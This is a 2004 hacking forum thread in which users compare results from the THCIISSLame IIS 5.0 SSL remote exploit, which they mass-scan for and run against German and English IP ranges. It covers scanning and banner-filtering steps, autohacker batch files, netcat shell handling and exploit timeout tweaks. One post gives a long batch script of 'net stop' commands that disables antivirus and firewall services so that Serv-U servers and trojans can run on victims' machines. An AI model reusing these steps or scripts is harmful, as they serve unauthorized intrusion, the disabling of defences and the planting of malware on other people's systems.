seems that the main problem now is that people cant connect to serv-u once they started it
any with anwsers here on what to do ??
eXist
Apr 25 2004, 08:08 AM
Well I'm guessing the system has a firewall installed on there and/or there is an IP filter active. Make sure you have actually started it. If you really want to you could find out what AV software is running and kill it so you can start your all important server.
phoney
Apr 25 2004, 08:14 AM
Which CBPort is the best to forward routers ?
michael
Apr 25 2004, 09:51 AM
QUOTE (rvd @ Apr 24 2004, 05:39 PM)
Haven't got any shells this far, maybe i have just badluck or am i doing something wrong. I'll tell you what i did:
- I compiled the code with dev c++ with the mod of Ecko thank you for that. - I made a little autohacker in .bat file, not anything special. - Then i started scanning with a modified version of sfind, i scanned on port 443 at a german range. - After the scanning i did a banner scan from at the results of the port scan, (did it with Scanline: command sl -bhpt 80 -f input.txt -o output.txt - Filtered the banner scan and toke every ip where the banner scan said: Microsoft-IIS/5.0 - Then i put the ip's in a txt file and executed the autohacker.
How did u filter that banner scan...u got a prog for it ?
Meteor
Apr 25 2004, 09:52 AM
For all that can't start servu, or any trojan or anything else did you stop all AV? cause i see "Network Associates McShield" in the list of service name of realloader! I manage to star tojan or backdoor without any problem!
michael
Apr 25 2004, 10:06 AM
how did u manage that....i'd like to know
Meteor
Apr 25 2004, 10:56 AM
just stop AV and start the app you want, i don't understand what is the problem! net stop "AV service name" blabla.exe in the shell!
tte
Apr 25 2004, 11:02 AM
QUOTE (Meteor @ Apr 25 2004, 10:56 AM)
just stop AV and start the app you want, i don't understand what is the problem! net stop "AV service name" blabla.exe in the shell!
you got a list of AV Services names?
arn0ld
Apr 25 2004, 11:30 AM
tte there u go just make a .bat out of it : (just searched in the forum)
CODE
net stop ACKWIN32 net stop ADVXDWIN net stop ALERTSVC net stop ALOGSERV net stop AMON9X net stop ANTI-TROJAN net stop ANTS net stop apvxdwin net stop ATCON net stop ATUPDATER net stop ATWATCH net stop AUTODOWN net stop AutoTrace net stop AVCONSOL net stop AVGCC32 net stop AVGCTRL net stop Avgctrl net stop AVGSERV net stop AvgServ net stop AVGSERV9 net stop AVGW net stop avkpop net stop AVKSERV net stop avkservice net stop avkwctl9 net stop AVP32 net stop AVP32 net stop AVPCC net stop AVPCC net stop AVPM net stop AVPM net stop Avsched32 net stop AVSYNMGR net stop AvSynMgr net stop AVWINNT net stop AVXMONITOR9X net stop AVXMONITORNT net stop AVXQUAR net stop AVXW net stop BLACKD net stop BLACKICE net stop BlackICE net stop CLAW95 net stop CLAW95CF net stop CLEANER net stop CLEANER3 net stop CMGRDIAN net stop CONNECTIONMONITOR net stop defscangui net stop DEFWATCH net stop DOORS net stop DVP95 net stop EFPEADM net stop ETRUSTCIPE net stop EVPN net stop EXPERT net stop fameh32 net stop fch32 net stop fih32 net stop fnrb32 net stop fsaa net stop fsav32 net stop fsgk32 net stop fsm32 net stop fsma32 net stop fsmb32 net stop gbmenu net stop GENERICS net stop GUARD net stop GUARDDOG net stop HELP net stop IAMAPP net stop IAMSERV net stop ICLOAD95 net stop ICLOADNT net stop ICMON net stop ICSUPP95 net stop ICSUPPNT net stop IFACE net stop IOMON98 net stop ISRV95 net stop JEDI net stop LDNETMON net stop LDPROMENU net stop LDSCAN net stop LOCKDOWN net stop LOCKDOWN2000 net stop LUALL net stop LUCOMSERVER net stop MCAGENT net stop MCMNHDLR net stop MCSHIELD net stop McShield net stop MCTOOL net stop MCUPDATE net stop MCVSRTE net stop MCVSSHLD net stop MGAVRTCL net stop MGAVRTE net stop MGHTML net stop minilog net stop MONITOR net stop MOOLIVE net stop MWATCH net stop NAVAP net stop navapsvc net stop NAVAPW32 net stop NAVENG net stop NAVEX15 net stop NAVLU32 net stop NAVW32 net stop NAVWNT net stop NDD32 net stop NeoWatchLog net stop NETUTILS net stop ngdbserv net stop NGServer net stop NISSERV net stop NISSERV net stop NISUM net stop NISUM net stop NMAIN net stop NORMIST net stop NPROTECT net stop NPSSVC net stop NSCHED32 net stop ntrtscan net stop NTVDM net stop NTXconfig net stop NVC95 net stop NVSVC32 net stop NWService net stop NWTOOL16 net stop PADMIN net stop pavproxy net stop PCCIOMON net stop pccntmon net stop pccwin97 net stop PCCWIN98 net stop pcscan net stop PERSFW net stop POP3TRAP net stop POPROXY net stop PORTMONITOR net stop PROCESSMONITOR net stop PROGRAMAUDITOR net stop PROT95 net stop PVIEW95 net stop RAV7 net stop RAV7WIN net stop REALMON net stop RESCUE net stop RTVSCN95 net stop sbserv net stop SCAN32 net stop SCRSCAN net stop sharedaccess net stop SPHINX net stop SPYXX net stop SS3EDIT net stop STOPW net stop SVW3 net stop SWEEP95 net stop SweepNet net stop SWEEPSRV net stop SWEEPSRV.SYS net stop SweepUpdate net stop SWNETSUP net stop SymProxySvc net stop SYMTRAY net stop TFAK net stop vbcmserv net stop VbCons net stop VET32 net stop VET95 net stop VETTRAY net stop VPC32 net stop VPTRAY net stop VSCHED net stop VSECOMR net stop VSHWIN32 net stop VSMAIN net stop vsmon net stop VSMON net stop VSSTAT net stop WATCHDOG net stop WEBSCANX net stop WGFE95 net stop WIMMUN32 net stop WRADMIN net stop WRCTRL net stop ZAPROMINILOG net stop ZONEALARM
Meteor
Apr 25 2004, 11:32 AM
simply by typing "net start" and u will see all service in the remote machine that has been started
Silent Bob
Apr 25 2004, 11:36 AM
oh dear, idiots come on think about it, (oh yeah when you make that bat some AVs will call it a virus anyway) thanks for the code gunna give it a test
ind0r
Apr 25 2004, 11:57 AM
when i get shell after about 60 seconds I get disconnect. could anyone help? 'net user' didn't work, I get error with rpc.
jpno5
Apr 25 2004, 01:20 PM
bloody n00bs, use the new perl script
Meteor
Apr 25 2004, 01:28 PM
yes the new perl script might be good but doesn't work for me ^^ if "net user" don't work... nothing with net command can be done i think, so try an another ip
DarkAngel52457
Apr 25 2004, 01:28 PM
Than give us the link to the new perl exploit then i have a lot of things test it an not can connect to serv-u
THCIISSLame v0.2 - IIS 5.0 SSL remote root exploit tested on Windows 2000 Server german/english SP4 by Johnny Cyberpunk (jcyberpunk@thc.org)
[*] modded version by Ecko --> greetz to FireBlade, XeroX [*])
[*] Buffer is loading [*] trying to get a connection... [*] send Exploit bind error() 10048
With Your Auto Haxor Gui G777, I have this error without netcat opened. Problem or bad target ?
Ecko
Apr 25 2004, 01:33 PM
yo guufa...you NEED NETCAT...without out it wouldn't work...the bind error is the reason
DarkAngel52457
Apr 25 2004, 01:37 PM
this tool works fine i have many shells you ignore the button nc
the prob is you upload your serv-u an start this than you will connect whit flashfxp and you can not conect
guufa
Apr 25 2004, 01:47 PM
With Netcat or without netcat its the same : bind error.
How can I make ?
porc1978
Apr 25 2004, 02:02 PM
QUOTE (guufa @ Apr 25 2004, 01:47 PM)
With Netcat or without netcat its the same : bind error.
How can I make ?
I've got the same problem but only with nc opened ( the port is 3245)...anyone has idea about it?
Meteor
Apr 25 2004, 02:24 PM
you don't need netcat if netcat listen on port 444 and you choose 444 for bind port, it cause a bind error in the sploit
Ecko
Apr 25 2004, 02:31 PM
hm...i've got also NO problems with it...I use old ntpw servers and store their netcat on port 1199...i controll them via telnet...no probs
michael
Apr 25 2004, 03:36 PM
thx to all of u i got this 1 figured out mucho gracias
saendler
Apr 25 2004, 04:18 PM
@g777 nice gui method...thx a lot....
mighty_falcon
Apr 25 2004, 04:46 PM
hmmm has this exploit worked for anyone yet? like getting a real shell on the remote computer?
i have tried it a few times but i get timed out, could not attack server
Qlimax
Apr 25 2004, 05:18 PM
i try 2 hack with the autohacker of G777 big list and everybody is:
CODE
[*] Buffer is loading [*] trying to get a connection... [*] send Exploit [*] Warte auf ankommende shell [*] Server couldn't be attacked - Timeout!
mighty_falcon
Apr 25 2004, 05:22 PM
QUOTE (Qlimax @ Apr 25 2004, 05:18 PM)
i try 2 hack with the autohacker of G777 big list and everybody is:
CODE
[*] Buffer is loading [*] trying to get a connection... [*] send Exploit [*] Warte auf ankommende shell [*] Server couldn't be attacked - Timeout!
yep, im getting the same think almost everyone is patched by now
Krogoth
Apr 25 2004, 05:27 PM
the chances of getting a shell is like 1 out of 500. i'm using both ver 0.1 and 0.2. all i can say is, most are firewalled or patched if you don't get any shell.
g777: thanks for the nice gui i'll experiment it when i have free time.
HAnzsz
Apr 25 2004, 05:56 PM
w0000t
getting shells 1 outta 5
just bannerscan your port 443 results on english ranges "microsoft iis 5.0"
it PWnz thx
Ecko
Apr 25 2004, 05:59 PM
but with which tool you scan for banners??plz share
Lol ! It cant work With a sleep(6000) you will ALWAYS get printf("[*] exploit didn't w0rk - timeout!\n\n");
If u want to do something like this u have to intiate a process who will look at the motherprocess and who will kill it after some milliseconds of inactivity.
Lanig
Apr 28 2004, 01:14 PM
what i did to prevent timeout is simply removed the part where it creates a listening socket and just jump to send the shellcode and printf waiting for shell for a couple of seconds in the meantime i have another netcat window that gets the shell... more useful for autohacking
Ecko
Apr 28 2004, 02:29 PM
thats right you will always get the "timeout". But it musn't be a timeout if it work you should get a shell! just watch your netcat
onurize
Apr 29 2004, 03:28 AM
bind_error help me plZ!
polpotx
Apr 29 2004, 03:37 AM
I've tryed to compiled this myself ... but i got this errot:
QUOTE
(18) : fatal error C1083: Cannot open include file: 'winsock2.h': No such file or directory
I am using Microsoft Visual C++ Toolkit . Can someone advice me about this ? Why The compiled didn;t find the winsock2.h ? Where can i get it from ?
Best regards
Ecko
Apr 29 2004, 02:54 PM
@onurize
means you netcat doesn't work!
@polpotx
you should compile it with visual c++ enterprise (get it with kazaa ) (i dit it too successfully complie with it)
hope could hel
ppeaz
onurize
Apr 29 2004, 05:27 PM
@ ecko but it must work i use the autohaxor with netcat... but i scan 1000 Ips no shell
can you help me plz ? over ICQ or Email or somethink ?
Ecko
Apr 29 2004, 05:58 PM
ok onurize pmed you
jak3c
Apr 29 2004, 07:47 PM
very good exploit...! thanks you for sharing your code ... i will test it if i have some time !
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
